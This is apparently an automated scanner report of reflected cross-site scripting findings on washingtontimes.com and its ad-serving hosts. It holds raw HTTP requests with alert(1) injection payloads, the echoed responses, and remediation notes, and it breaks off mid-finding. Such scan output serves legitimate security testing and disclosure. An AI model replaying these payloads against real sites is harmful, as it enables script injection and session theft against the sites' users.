HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 7065 Date: Mon, 13 Dec 2010 21:38:59 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-80828934_1292276339","http://ad.doubleclick.net//q1.test/home?42430'-alert(1)-'23afa6ec51c=1;net=q1;u=,q1-80828934_1292276339,,none,;;contx=none;dc=d;btg=?","0","0",false);</scr'+'ipt> ...[SNIP]...
The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9d92"-alert(1)-"2d4784f5ced was submitted in the mpt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cm/js/9826-95389-2653-9?mpt=7568887a9d92"-alert(1)-"2d4784f5ced&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3a6f/3/0/%2a/f%3B222302661%3B0-0%3B0%3B37858617%3B4307-300/250%3B35790835/35808676/1%3B%3B%7Esscs%3D%3f HTTP/1.1 Host: cdn4.eyewonder.com Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=70531435002; mojo3=10295:1039
var failclickTag_1358607 = "http://ad.doubleclick.net/click;h=v8/3a6f/3/0/*/f;222302661;0-0;0;37858617;4307-300/250;35790835/35808676/1;;~sscs=?http://cdn4.eyewonder.com/cm/ck/9826-95389-2653-9?mpt=7568887a9d92"-alert(1)-"2d4784f5ced&6034571=0"; var clickTag1_1358607 = "http://ad.doubleclick.net/click;h=v8/3a6f/3/0/*/f;222302661;0-0;0;37858617;4307-300/250;35790835/35808676/1;;~sscs=?http://cdn4.eyewonder.com/cm/ck/9826-95389-2653 ...[SNIP]...
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff0c5"%3balert(1)//29754010ca5 was submitted in the mpvc parameter. This input was echoed as ff0c5";alert(1)//29754010ca5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cm/js/9826-95389-2653-9?mpt=7568887&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3a6f/3/0/%2a/f%3B222302661%3B0-0%3B0%3B37858617%3B4307-300/250%3B35790835/35808676/1%3B%3B%7Esscs%3D%3fff0c5"%3balert(1)//29754010ca5 HTTP/1.1 Host: cdn4.eyewonder.com Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=70531435002; mojo3=10295:1039
var failclickTag_1358607 = "http://ad.doubleclick.net/click;h=v8/3a6f/3/0/*/f;222302661;0-0;0;37858617;4307-300/250;35790835/35808676/1;;~sscs=?ff0c5";alert(1)//29754010ca5http://cdn4.eyewonder.com/cm/ck/9826-95389-2653-9?mpt=7568887&6034571=0"; var clickTag1_1358607 = "http://ad.doubleclick.net/click;h=v8/3a6f/3/0/*/f;222302661;0-0;0;37858617;4307-300/250;35790835/35808 ...[SNIP]...
3.13. http://cdn4.eyewonder.com/cm/js/9826-95389-2653-9 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cdn4.eyewonder.com
Path:
/cm/js/9826-95389-2653-9
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0f6d"-alert(1)-"15ac2a66929 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cm/js/9826-95389-2653-9?b0f6d"-alert(1)-"15ac2a66929=1 HTTP/1.1 Host: cdn4.eyewonder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mojo3=10295:1039; svid=70531435002;
var failclickTag_1358607 = "<mpvc/>http://cdn4.eyewonder.com/cm/ck/9826-95389-2653-9?b0f6d"-alert(1)-"15ac2a66929=1&6034571=0"; var clickTag1_1358607 = "<mpvc/>http://cdn4.eyewonder.com/cm/ck/9826-953 ...[SNIP]...
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6641"%3balert(1)//b5039ce5801 was submitted in the mpck parameter. This input was echoed as b6641";alert(1)//b5039ce5801 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/9826/95389/WashingtonTimes-300-250-GE_EcoQuiz_300x250_2-Banner-1358607.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F9826-95389-2653-9%3Fmpt%3D7568887b6641"%3balert(1)//b5039ce5801&mpt=7568887&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3a6f/3/0/%2a/f%3B222302661%3B0-0%3B0%3B37858617%3B4307-300/250%3B35790835/35808676/1%3B%3B%7Esscs%3D%3f HTTP/1.1 Host: cdn4.eyewonder.com Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=70531435002; mojo3=10295:1039
var failclickTag_1358607 = "http://ad.doubleclick.net/click;h=v8/3a6f/3/0/*/f;222302661;0-0;0;37858617;4307-300/250;35790835/35808676/1;;~sscs=?http://cdn4.eyewonder.com/cm/ck/9826-95389-2653-9?mpt=7568887b6641";alert(1)//b5039ce5801&6034571=0"; var clickTag1_1358607 = "http://ad.doubleclick.net/click;h=v8/3a6f/3/0/*/f;222302661;0-0;0;37858617;4307-300/250;35790835/35808676/1;;~sscs=?http://cdn4.eyewonder.com/cm/ck/9826-95389-2653 ...[SNIP]...
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58455"%3balert(1)//53519a2a4b7 was submitted in the mpvc parameter. This input was echoed as 58455";alert(1)//53519a2a4b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/9826/95389/WashingtonTimes-300-250-GE_EcoQuiz_300x250_2-Banner-1358607.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F9826-95389-2653-9%3Fmpt%3D7568887&mpt=7568887&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3a6f/3/0/%2a/f%3B222302661%3B0-0%3B0%3B37858617%3B4307-300/250%3B35790835/35808676/1%3B%3B%7Esscs%3D%3f58455"%3balert(1)//53519a2a4b7 HTTP/1.1 Host: cdn4.eyewonder.com Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=70531435002; mojo3=10295:1039
var failclickTag_1358607 = "http://ad.doubleclick.net/click;h=v8/3a6f/3/0/*/f;222302661;0-0;0;37858617;4307-300/250;35790835/35808676/1;;~sscs=?58455";alert(1)//53519a2a4b7http://cdn4.eyewonder.com/cm/ck/9826-95389-2653-9?mpt=7568887&6034571=0"; var clickTag1_1358607 = "http://ad.doubleclick.net/click;h=v8/3a6f/3/0/*/f;222302661;0-0;0;37858617;4307-300/250;35790835/35808 ...[SNIP]...
The value of the esi request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a653a'-alert(1)-'b549bf6e82 was submitted in the esi parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.17. http://core.insightexpressai.com/adServer/GetInvite2.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://core.insightexpressai.com
Path:
/adServer/GetInvite2.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18ad2'-alert(1)-'92f7c0bd65f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the referer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 797e9'-alert(1)-'74b0b58b314 was submitted in the referer parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.19. http://core.insightexpressai.com/adServer/adServerESI.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://core.insightexpressai.com
Path:
/adServer/adServerESI.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e98c2"%3balert(1)//1e992bbbffc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e98c2";alert(1)//1e992bbbffc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
function IX_InviteAllowed(){var f=typeof(window.sitePerformedInvite)!='function' || !window.sitePerformedInvite();return f;} function IX_InvitePerformed(){if (typeof(window.siteInvited)=='f ...[SNIP]... tePerformed();var s = document.createElement('script');s.language='javascript';s.src="http://core.insightexpressai.com/adServer/GetInvite2.aspx?esi=true&bannerID=171516&referer=www.washingtontimes.com&e98c2";alert(1)//1e992bbbffc=1";document.getElementsByTagName('head')[0].appendChild(s);}})();
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 37370<script>alert(1)</script>d467acb9624 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /static37370<script>alert(1)</script>d467acb9624/js/global.js HTTP/1.1 Host: media.washtimes.com Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Status: 404 Content-Type: text/html Date: Mon, 13 Dec 2010 21:22:26 GMT Server: lighttpd/1.4.26 Connection: close
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www. ...[SNIP]... <h2>Original file ('/twt-media/export/twt/static37370<script>alert(1)</script>d467acb9624/js/global.js') does not exist</h2> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 126d3<script>alert(1)</script>8e4d52393f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /static/js126d3<script>alert(1)</script>8e4d52393f7/global.js HTTP/1.1 Host: media.washtimes.com Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Status: 404 Content-Type: text/html Date: Mon, 13 Dec 2010 21:22:28 GMT Server: lighttpd/1.4.26 Connection: close
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www. ...[SNIP]... <h2>Original file ('/twt-media/export/twt/static/js126d3<script>alert(1)</script>8e4d52393f7/global.js') does not exist</h2> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7b260<script>alert(1)</script>dc4be321694 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /static/js/global.js7b260<script>alert(1)</script>dc4be321694 HTTP/1.1 Host: media.washtimes.com Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Status: 404 Content-Type: text/html Date: Mon, 13 Dec 2010 21:22:29 GMT Server: lighttpd/1.4.26 Connection: close
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www. ...[SNIP]... <h2>Original file ('/twt-media/export/twt/static/js/global.js7b260<script>alert(1)</script>dc4be321694') does not exist</h2> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6b4ea<script>alert(1)</script>c8293065a78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /static6b4ea<script>alert(1)</script>c8293065a78/js/jquery.cookies.js HTTP/1.1 Host: media.washtimes.com Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Status: 404 Content-Type: text/html Date: Mon, 13 Dec 2010 21:22:27 GMT Server: lighttpd/1.4.26 Connection: close
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www. ...[SNIP]... <h2>Original file ('/twt-media/export/twt/static6b4ea<script>alert(1)</script>c8293065a78/js/jquery.cookies.js') does not exist</h2> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c91d8<script>alert(1)</script>86882e37647 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /static/jsc91d8<script>alert(1)</script>86882e37647/jquery.cookies.js HTTP/1.1 Host: media.washtimes.com Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Status: 404 Content-Type: text/html Date: Mon, 13 Dec 2010 21:22:29 GMT Server: lighttpd/1.4.26 Connection: close
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www. ...[SNIP]... <h2>Original file ('/twt-media/export/twt/static/jsc91d8<script>alert(1)</script>86882e37647/jquery.cookies.js') does not exist</h2> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4fd18<script>alert(1)</script>1ea7b8b337a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /static/js/jquery.cookies.js4fd18<script>alert(1)</script>1ea7b8b337a HTTP/1.1 Host: media.washtimes.com Proxy-Connection: keep-alive Referer: http://www.washingtontimes.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Status: 404 Content-Type: text/html Date: Mon, 13 Dec 2010 21:22:33 GMT Server: lighttpd/1.4.26 Connection: close
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www. ...[SNIP]... <h2>Original file ('/twt-media/export/twt/static/js/jquery.cookies.js4fd18<script>alert(1)</script>1ea7b8b337a') does not exist</h2> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8e03"%3b8f7d9a42596 was submitted in the REST URL parameter 1. This input was echoed as f8e03";8f7d9a42596 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aboutf8e03"%3b8f7d9a42596/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14740 Date: Mon, 13 Dec 2010 21:23:00 GMT X-Varnish: 570569731 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... cript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="aboutf8e03";8f7d9a42596"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4effa'%3b6b9ded45765 was submitted in the REST URL parameter 1. This input was echoed as 4effa';6b9ded45765 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about4effa'%3b6b9ded45765/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14576 Date: Mon, 13 Dec 2010 21:23:02 GMT X-Varnish: 570569835 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1a3b'%3bf9c9b7fd0b8 was submitted in the REST URL parameter 1. This input was echoed as a1a3b';f9c9b7fd0b8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /accountsa1a3b'%3bf9c9b7fd0b8/login/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14725 Date: Mon, 13 Dec 2010 21:23:30 GMT X-Varnish: 570570623 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e701"%3b6f875744f5f was submitted in the REST URL parameter 1. This input was echoed as 8e701";6f875744f5f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /accounts8e701"%3b6f875744f5f/login/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14591 Date: Mon, 13 Dec 2010 21:23:27 GMT X-Varnish: 570570398 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... pt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="accounts8e701";6f875744f5f"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10d35'%3bc7939c0c420 was submitted in the REST URL parameter 1. This input was echoed as 10d35';c7939c0c420 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /accounts10d35'%3bc7939c0c420/logout/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14732 Date: Mon, 13 Dec 2010 21:23:06 GMT X-Varnish: 570569889 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f300a"%3bc2366934839 was submitted in the REST URL parameter 1. This input was echoed as f300a";c2366934839 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /accountsf300a"%3bc2366934839/logout/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14591 Date: Mon, 13 Dec 2010 21:22:59 GMT X-Varnish: 570569719 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... pt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="accountsf300a";c2366934839"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6116a'%3bade452d872d was submitted in the REST URL parameter 1. This input was echoed as 6116a';ade452d872d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /accounts6116a'%3bade452d872d/password/change/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14550 Date: Mon, 13 Dec 2010 21:24:14 GMT X-Varnish: 570571830 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df994"%3b08591c70a07 was submitted in the REST URL parameter 1. This input was echoed as df994";08591c70a07 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
